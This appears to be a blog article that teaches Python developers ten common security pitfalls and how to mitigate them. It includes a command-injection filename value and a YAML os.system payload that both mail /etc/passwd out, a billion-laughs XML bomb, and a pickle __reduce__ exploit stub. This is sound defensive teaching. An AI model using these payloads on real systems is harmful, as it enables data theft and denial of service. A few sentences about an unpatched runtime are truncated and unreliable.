Writing secure code is hard. When you learn a language, a module or a framework, you learn how it is supposed to be used. When thinking about security, you need to think about how it can be misused. Python is no exception: even within the standard library there are documented bad practices for writing hardened applications. Yet many of the Python developers I’ve spoken to simply aren’t aware of them.
Here are my top 10, in no particular order, common gotchas in Python applications.
SQL injection is where you’re writing SQL queries directly instead of using an ORM and mixing your string literals with variables. I’ve read plenty of code where “escaping quotes” is deemed a fix. It isn’t. Familiarise yourself with all the complex ways SQL injection can happen.
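As a minimal sketch of the alternative to string mixing, here is a parameterized query using the standard library’s sqlite3 module. The `users` table and the `find_user` helper are hypothetical names made up for illustration; other database drivers use a similar placeholder mechanism, though the placeholder syntax varies.

```python
import sqlite3


def find_user(conn, username):
    # The "?" placeholder makes the driver pass username as data,
    # so it is never interpreted as part of the SQL text.
    cursor = conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    )
    return cursor.fetchall()


# Hypothetical in-memory table, used only for this illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])

rows_ok = find_user(conn, "alice")
# A classic injection string is treated as a (non-matching) literal name.
rows_attack = find_user(conn, "' OR '1'='1")
```

With string formatting, the second call would have matched every row; with a placeholder it matches none.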
Command injection is anytime you’re calling a process using popen, subprocess, os.system and taking arguments from variables. When calling local commands there’s a possibility of someone setting those values to something malicious.
Imagine this simple script. You call a subprocess with the filename as provided by the user:

    import subprocess

    def transcode_file(request, filename):
        command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
        subprocess.call(command, shell=True)  # a bad idea!
The attacker sets the value of filename to "; cat /etc/passwd | mail [email protected]
or something equally dangerous.
For the shell, use the shlex module to escape input correctly.
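A rough sketch of both options follows: passing an argument list so that no shell is involved, and quoting with `shlex.quote` when a shell string really is needed. The `build_transcode_command` helper is a hypothetical name, and the actual `subprocess.run` call is left commented out because it assumes ffmpeg is installed.

```python
import shlex


def build_transcode_command(filename):
    # Each list element becomes exactly one argument of the child process,
    # so shell metacharacters in filename are never interpreted.
    return ["ffmpeg", "-i", filename, "output_file.mpg"]


malicious = '"; cat /etc/passwd'
cmd = build_transcode_command(malicious)
# import subprocess
# subprocess.run(cmd, check=True)  # shell=False is the default

# If a shell command string is unavoidable, quote every untrusted value.
quoted = shlex.quote(malicious)
shell_command = "ffmpeg -i {} output_file.mpg".format(quoted)
```

Note that an argument list only prevents shell interpretation. A filename that starts with `-` could still be read as an option by the called program, so validating the value is worthwhile too.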
If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML, mostly DoS-style (designed to crash systems rather than exfiltrate data). Those attacks are common, especially if you’re parsing external (i.e. non-trusted) XML files.
One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)
Another attack uses external entity expansion. XML supports referencing entities from external URLs, the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”
Another situation to consider is 3rd party packages you’re depending on that decode XML, such as configuration files or remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks. So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks. It’s well documented.
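The third-party defusedxml package is the usual drop-in replacement for the standard library parsers. To illustrate the underlying idea using only the standard library, here is a minimal sketch that refuses any document declaring an entity before it is handed to a real parser. The `reject_entity_declarations` helper and the `EntitiesForbidden` exception are names invented for this example, and the check is deliberately strict: it rejects harmless entity declarations as well.

```python
from xml.parsers import expat


class EntitiesForbidden(ValueError):
    """Raised when a document declares an XML entity."""


def reject_entity_declarations(xml_text):
    parser = expat.ParserCreate()

    def on_entity_decl(name, *rest):
        # Called for every <!ENTITY ...> declaration, before any expansion.
        raise EntitiesForbidden("entity declaration not allowed: %s" % name)

    parser.EntityDeclHandler = on_entity_decl
    # Exceptions raised inside a handler propagate out of Parse().
    parser.Parse(xml_text, True)


# A tiny "billion laughs"-style payload (only two levels deep here).
BOMB = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;">
]>
<lolz>&lol2;</lolz>"""
```

Calling `reject_entity_declarations(BOMB)` raises `EntitiesForbidden`, while an ordinary document without a DTD passes through silently.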
Now, by default Python executes with __debug__ as true, but in a production environment it’s common to run with optimizations. This will skip the assert statement and go straight to the secure code regardless of whether the user is_admin or not.
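A minimal sketch of a check that survives optimized mode: an explicit `if` that raises, instead of an assert. The function name and its `user_is_admin` parameter are hypothetical stand-ins for whatever your application uses.

```python
def delete_all_users(user_is_admin):
    # An explicit check still runs under "python -O",
    # whereas an assert statement would be compiled away.
    if not user_is_admin:
        raise PermissionError("admin rights required")
    # ... the privileged work would happen here ...
    return "deleted"
```

Keep assert statements for tests and for documenting internal invariants, not for enforcing access control.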
Use secrets.compare_digest to compare passwords and other private values.
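For illustration, a small sketch of a comparison whose running time does not depend on where the two values first differ. The `token_matches` helper is a hypothetical name; the values are encoded to bytes because `compare_digest` only accepts ASCII when given `str` arguments.

```python
import secrets


def token_matches(supplied, expected):
    # compare_digest takes the same time wherever the inputs differ,
    # unlike ==, which can stop at the first mismatching character.
    return secrets.compare_digest(
        supplied.encode("utf-8"), expected.encode("utf-8")
    )
```

For example, `token_matches(request_token, stored_token)` would replace a plain `request_token == stored_token` check.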
To create temporary files in Python, you’d typically generate a file name using the [mktemp()](//docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") function and then create a file using this name. “This is not secure, because a different process may create a file with this name in the time between the call to [mktemp()](//docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") and the subsequent attempt to create the file by the first process.” This means an attacker could trick your application into either loading the wrong data or exposing other temporary data.
Use the tempfile module’s mkstemp if you need to generate temporary files.
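A short sketch of how that might look. `mkstemp` creates and opens the file in a single step, so there is no window in which another process can claim the name first. The `write_temp` helper is a made-up name for this example.

```python
import os
import tempfile


def write_temp(data):
    # mkstemp returns an already-open file descriptor plus the path;
    # the file is created readable and writable only by the current user.
    fd, path = tempfile.mkstemp(suffix=".tmp")
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


path = write_temp(b"scratch data")
with open(path, "rb") as handle:
    contents = handle.read()
# mkstemp does not delete the file for you; clean up when done.
os.remove(path)
```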
“Warning: It is not safe to call **yaml.load** with any data received from an untrusted source! **yaml.load** is as powerful as **pickle.load** and so may call any Python function.”
This beautiful example was found in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls os.system() with the arguments provided in the file.
!!python/object/apply:os.system ["cat /etc/passwd | mail [email protected]"]
So, effectively loading YAML files from user-provided values leaves you wide-open to attack.
Demo of this in action, credit Anthony Sottile
Use yaml.safe_load pretty much always, unless you have a really good reason not to.
Deserializing pickle data is just as bad as YAML. Python classes can declare a magic method called __reduce__ which returns a string, or a tuple with a callable and the arguments to call when pickling. The attacker can use that to include references to one of the subprocess modules to run arbitrary commands on the host.
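The safest option is never to unpickle data from an untrusted source. If you cannot avoid it, one mitigation (adapted from the approach in the pickle documentation) is to restrict which globals the unpickler may resolve. The sketch below uses the invented names `RestrictedUnpickler`, `restricted_loads` and `SAFE_BUILTINS`, and the allow-list itself is an assumption you would tailor to your data.

```python
import builtins
import io
import pickle

# Hypothetical allow-list: the only globals a pickle may reference.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # find_class is called whenever a pickle references a global,
        # which includes the callable returned by __reduce__.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Exploit:
    # Stand-in for an attacker's payload: asks the unpickler to call eval().
    def __reduce__(self):
        return (eval, ("1 + 1",))


payload = pickle.dumps(Exploit())
```

Here `pickle.loads(payload)` would call `eval`, whereas `restricted_loads(payload)` raises `pickle.UnpicklingError`. Plain containers of numbers and strings still load normally.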
So you’re safe. That is, if you patch your runtime.
, an integer overflow vulnerability that enables code execution. any un-patched version of Ubuntu pre-17. Install the latest version of Python for your production applications, and patch it!
I find the practice of “pinning” versions of Python packages from PyPI in packages terrifying. The idea is that “these are the versions that work” so everyone leaves it alone.
All of the vulnerabilities in code I’ve mentioned above are just as important when they exist in packages that your application uses. Developers of those packages fix security issues. All the time.
It’s called bandit, just pip install bandit and bandit ./codedir
Credit to Red Hat for the article that I used in some of my research.